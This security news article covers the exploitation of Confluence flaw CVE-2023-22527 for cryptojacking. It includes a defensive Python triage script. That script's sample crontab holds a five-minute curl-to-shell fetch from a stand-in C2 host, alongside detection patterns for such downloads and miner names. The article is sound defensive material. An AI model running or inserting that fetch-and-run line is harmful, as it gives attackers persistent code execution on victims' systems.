Critical Atlassian Confluence Flaw Exploited for Cryptocurrency Mining

Threat actors are actively exploiting a critical security vulnerability in Atlassian Confluence Data Center and Confluence Server to conduct unauthorized cryptocurrency mining on vulnerable instances. This vulnerability, tracked as CVE-2023-22527, has already been patched, but unpatched systems remain at significant risk.

The Vulnerability: CVE-2023-22527

CVE-2023-22527 is a severe flaw in older versions of Atlassian Confluence Data Center and Confluence Server. It allows unauthenticated attackers to achieve remote code execution, which can lead to complete system compromise. Atlassian addressed this vulnerability in mid-January 2024, urging users to update their software to the latest versions to protect against potential exploitation.

Exploit Activity

Despite the availability of patches, many organizations have not yet applied the necessary updates, leaving their systems open to attacks. Between mid-June and the end of July 2024, Trend Micro researchers observed a surge in exploitation attempts targeting this vulnerability. Attackers used these exploits to deploy the XMRig miner, a popular tool for cryptojacking that mines Monero cryptocurrency by using the victim's computing resources.

Techniques Used by Attackers

At least three different threat actors are believed to be behind the malicious activities exploiting CVE-2023-22527. Their methods include:

  1. Deploying XMRig Miner via ELF Payload: Attackers use specially crafted requests to deliver an ELF file payload, which installs the XMRig miner on unpatched systems.

  2. Using Shell Scripts: In some cases, attackers deploy shell scripts that perform several actions to maximize mining efficiency and evade detection:

    • Terminating Competing Cryptojacking Campaigns: The script kills processes associated with other cryptojacking campaigns, such as Kinsing.
    • Deleting Existing Cron Jobs: The script deletes all current cron jobs to eliminate potential detection and interference.
    • Uninstalling Cloud Security Tools: The script removes cloud security tools, particularly from Alibaba and Tencent, which might detect and block the cryptojacking activities.
    • Gathering System Information: The script collects information about the infected system, which may be used for further exploitation or to optimize mining performance.
    • Setting Up New Cron Jobs: The script creates a new cron job that establishes a connection to the command-and-control (C2) server every five minutes, ensuring persistent access and control over the infected system.
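The shell-script behaviours listed above (a five-minute C2 beacon planted in cron, a miner process running on the host) leave traces a defender can look for. The following triage script is an added example written for this article, not Trend Micro's or Atlassian's code; it parses crontab text and `ps`-style process listings and flags entries matching that tradecraft. The sample crontab and process list are constructed, the hostnames are placeholders, and the process-name and command patterns are illustrative assumptions, not indicators published in the report. It also serves the "Monitor Network Traffic" recommendation below in the narrow sense of spotting the scheduled outbound fetch on the host itself.

```python
"""Host triage for the cryptojacking tradecraft described in the article."""
import re
from dataclasses import dataclass

# Constructed sample crontab (not from the article): one benign entry and one
# five-minute beacon that fetches a remote script and pipes it into a shell.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://c2.example.invalid/update.sh | sh
"""

# Constructed sample output in the shape of `ps -eo pid,user,comm,args`.
SAMPLE_PS = """\
  PID USER     COMMAND         COMMAND
    1 root     systemd         /sbin/init
 2141 conflu   java            /usr/bin/java -jar /opt/app/confluence.jar
 5123 conflu   xmrig           /tmp/.x/xmrig -o pool.example.invalid:3333
"""

# Assumed patterns: a downloader piped straight into a shell, and the two
# miner/campaign names the article mentions.
REMOTE_FETCH_RE = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash)\b")
MINER_NAME_RE = re.compile(r"\b(xmrig|kinsing)\b", re.IGNORECASE)


@dataclass
class Finding:
    kind: str    # "cron-beacon", "cron-remote-exec" or "miner-process"
    detail: str  # the offending line, for the analyst


def parse_cron_lines(text):
    """Yield (five schedule fields, command) for each non-comment crontab line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue  # malformed or @reboot-style line; out of scope here
        yield parts[:5], parts[5]


def beacon_interval_minutes(minute_field):
    """Return N for a '*/N' minute field, else None."""
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def scan_crontab(text, max_interval=5):
    """Flag short-interval jobs that fetch remote content and execute it."""
    findings = []
    for sched, cmd in parse_cron_lines(text):
        interval = beacon_interval_minutes(sched[0])
        fetch = REMOTE_FETCH_RE.search(cmd)
        if fetch and interval is not None and interval <= max_interval:
            findings.append(Finding("cron-beacon", f"every {interval} min: {cmd}"))
        elif fetch:
            findings.append(Finding("cron-remote-exec", cmd))
    return findings


def scan_processes(text):
    """Flag processes whose name or arguments match known miner names."""
    findings = []
    for line in text.splitlines()[1:]:  # skip the header row
        cols = line.split(None, 3)
        if len(cols) < 4:
            continue
        pid, user, comm, args = cols
        if MINER_NAME_RE.search(comm) or MINER_NAME_RE.search(args):
            findings.append(Finding("miner-process", f"pid {pid} ({user}): {args}"))
    return findings


def triage(crontab_text, ps_text):
    """Combine both checks; on a real host feed it `crontab -l` and `ps` output."""
    return scan_crontab(crontab_text) + scan_processes(ps_text)


if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB, SAMPLE_PS):
        print(f"[{f.kind}] {f.detail}")
```

The cron check is deliberately two-tiered: any job that pipes a download into a shell is worth a look, and one that does so on a five-minute (or shorter) schedule matches the beaconing pattern described above. Run it against every user's crontab and the system cron directories, not just root's, since the script in question replaces whatever jobs it finds.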

The Risks of Cryptojacking

Cryptojacking, the unauthorized use of computer systems to mine cryptocurrency, can have serious consequences for organizations. It can significantly degrade system performance, increase energy consumption, and lead to higher operational costs. More critically, the presence of cryptojacking software often indicates a security breach, which could expose organizations to other forms of cyber threats, such as data theft or ransomware attacks.

Recommendations

Trend Micro researcher Abdelrahman Esmail emphasized the urgent need for organizations to mitigate the risks associated with CVE-2023-22527 by updating their Atlassian Confluence installations to the latest versions. Regular patching and vulnerability management are essential in defending against exploitation attempts.

To protect against cryptojacking and other cyber threats, organizations should:

  • Apply Security Patches: Regularly update software to fix vulnerabilities as soon as patches become available.
  • Monitor Network Traffic: Use security tools to detect unusual network activity that could indicate cryptojacking.
  • Use Anti-Malware Solutions: Implement comprehensive anti-malware solutions that can detect and block cryptojacking software.
  • Educate Employees: Conduct cybersecurity awareness training to inform employees about potential threats and safe practices.


The exploitation of CVE-2023-22527 highlights the ongoing risks associated with unpatched software vulnerabilities. By staying vigilant and proactive in applying security updates, organizations can significantly reduce their exposure to cryptojacking and other cyber threats.

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067